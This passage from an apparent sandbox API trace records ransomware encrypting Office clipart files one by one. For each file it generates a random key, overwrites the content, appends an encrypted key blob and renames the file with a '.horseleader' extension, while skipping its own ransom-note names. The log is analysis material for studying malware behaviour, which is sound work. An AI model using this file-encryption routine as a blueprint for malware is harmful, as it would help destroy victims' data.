ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x9d0e, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD08868_.WMF", cAlternateFileName="")) returned 1 [0253.225] lstrcmpiW (lpString1="BD08868_.WMF", lpString2="Windows") returned -1 [0253.225] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 67 [0253.225] StrStrIW (lpFirst="BD08868_.WMF", lpSrch=".horseleader") returned 0x0 [0253.225] lstrcmpW (lpString1="BD08868_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.225] lstrcmpW (lpString1="BD08868_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.225] lstrlenW (lpString=".testttjffg") returned 11 [0253.225] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.225] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.225] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.226] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.226] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 67 [0253.226] StrStrW (lpFirst="BD08868_.WMF", lpSrch=".txt") returned 0x0 [0253.227] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=40206) returned 1 [0253.227] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.230] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.230] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.230] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4d0e, lpOverlapped=0x0) returned 1 [0253.231] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb2f2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.231] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4d0e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4d0e, lpOverlapped=0x0) returned 1 [0253.231] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.231] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.231] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.231] CloseHandle (hObject=0x158) returned 1 [0253.232] GetProcessHeap () returned 0x780000 [0253.232] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.232] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.horseleader") returned 79 [0253.232] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf.horseleader")) returned 1 [0253.233] GetProcessHeap () returned 0x780000 [0253.233] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.233] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbaaa, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD09031_.WMF", cAlternateFileName="")) returned 1 [0253.233] lstrcmpiW (lpString1="BD09031_.WMF", lpString2="Windows") returned -1 [0253.233] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 67 [0253.233] StrStrIW (lpFirst="BD09031_.WMF", lpSrch=".horseleader") returned 0x0 [0253.233] lstrcmpW (lpString1="BD09031_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.233] lstrcmpW (lpString1="BD09031_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.233] lstrlenW (lpString=".testttjffg") returned 11 [0253.233] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.233] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.233] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.233] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.234] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 67 [0253.234] StrStrW (lpFirst="BD09031_.WMF", lpSrch=".txt") returned 0x0 [0253.234] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=47786) returned 1 [0253.234] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.238] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.238] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.239] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.239] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1aaa, lpOverlapped=0x0) returned 1 [0253.239] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe556, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.239] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1aaa, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1aaa, lpOverlapped=0x0) returned 1 [0253.239] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.239] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.239] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.239] CloseHandle (hObject=0x158) returned 1 [0253.240] GetProcessHeap () returned 0x780000 [0253.240] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.240] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.horseleader") returned 79 [0253.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf.horseleader")) returned 1 [0253.241] GetProcessHeap () returned 0x780000 [0253.241] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.241] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x38cc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD09194_.WMF", cAlternateFileName="")) returned 1 [0253.241] lstrcmpiW (lpString1="BD09194_.WMF", lpString2="Windows") returned -1 [0253.241] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 67 [0253.241] StrStrIW (lpFirst="BD09194_.WMF", lpSrch=".horseleader") returned 0x0 [0253.241] lstrcmpW (lpString1="BD09194_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.241] lstrcmpW (lpString1="BD09194_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.241] lstrlenW (lpString=".testttjffg") returned 11 [0253.241] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.241] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.241] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.241] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.242] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 67 [0253.242] StrStrW (lpFirst="BD09194_.WMF", lpSrch=".txt") returned 0x0 [0253.242] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=14540) returned 1 [0253.242] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x38cc, lpOverlapped=0x0) returned 1 [0253.247] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc734, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.247] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x38cc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x38cc, lpOverlapped=0x0) returned 1 [0253.248] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.248] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.248] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.248] CloseHandle (hObject=0x158) returned 1 [0253.248] GetProcessHeap () returned 0x780000 [0253.248] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.249] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.horseleader") returned 79 [0253.249] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf.horseleader")) returned 1 [0253.250] GetProcessHeap () returned 0x780000 [0253.250] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.250] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x504a, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD09662_.WMF", cAlternateFileName="")) returned 1 [0253.250] lstrcmpiW (lpString1="BD09662_.WMF", lpString2="Windows") returned -1 [0253.250] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 67 [0253.250] StrStrIW (lpFirst="BD09662_.WMF", lpSrch=".horseleader") returned 0x0 [0253.250] lstrcmpW (lpString1="BD09662_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.250] lstrcmpW (lpString1="BD09662_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.250] lstrlenW (lpString=".testttjffg") returned 11 [0253.250] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.251] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.251] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.251] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.253] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 67 [0253.253] StrStrW (lpFirst="BD09662_.WMF", lpSrch=".txt") returned 0x0 [0253.253] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=20554) returned 1 [0253.253] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.256] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.257] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.257] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4a, lpOverlapped=0x0) returned 1 [0253.257] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffffb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.257] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4a, lpOverlapped=0x0) returned 1 [0253.257] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.257] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.257] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.258] CloseHandle (hObject=0x158) returned 1 [0253.258] GetProcessHeap () returned 0x780000 [0253.258] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.258] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.horseleader") returned 79 [0253.258] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf.horseleader")) returned 1 [0253.259] GetProcessHeap () returned 0x780000 [0253.259] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.259] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1f1e, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD09664_.WMF", cAlternateFileName="")) returned 1 [0253.259] lstrcmpiW (lpString1="BD09664_.WMF", lpString2="Windows") returned -1 [0253.259] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 67 [0253.259] StrStrIW (lpFirst="BD09664_.WMF", lpSrch=".horseleader") returned 0x0 [0253.259] lstrcmpW (lpString1="BD09664_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.259] lstrcmpW (lpString1="BD09664_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.259] lstrlenW (lpString=".testttjffg") returned 11 [0253.259] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.259] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.259] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.259] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.260] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 67 [0253.260] StrStrW (lpFirst="BD09664_.WMF", lpSrch=".txt") returned 0x0 [0253.260] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7966) returned 1 [0253.260] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1f1e, lpOverlapped=0x0) returned 1 [0253.262] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe0e2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.262] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1f1e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1f1e, lpOverlapped=0x0) returned 1 [0253.263] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.263] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.263] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.263] CloseHandle (hObject=0x158) returned 1 [0253.263] GetProcessHeap () returned 0x780000 [0253.263] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.263] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.horseleader") returned 79 [0253.263] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf.horseleader")) returned 1 [0253.264] GetProcessHeap () returned 0x780000 [0253.264] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.264] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c365a00, ftCreationTime.dwHighDateTime=0x1bd4f6a, 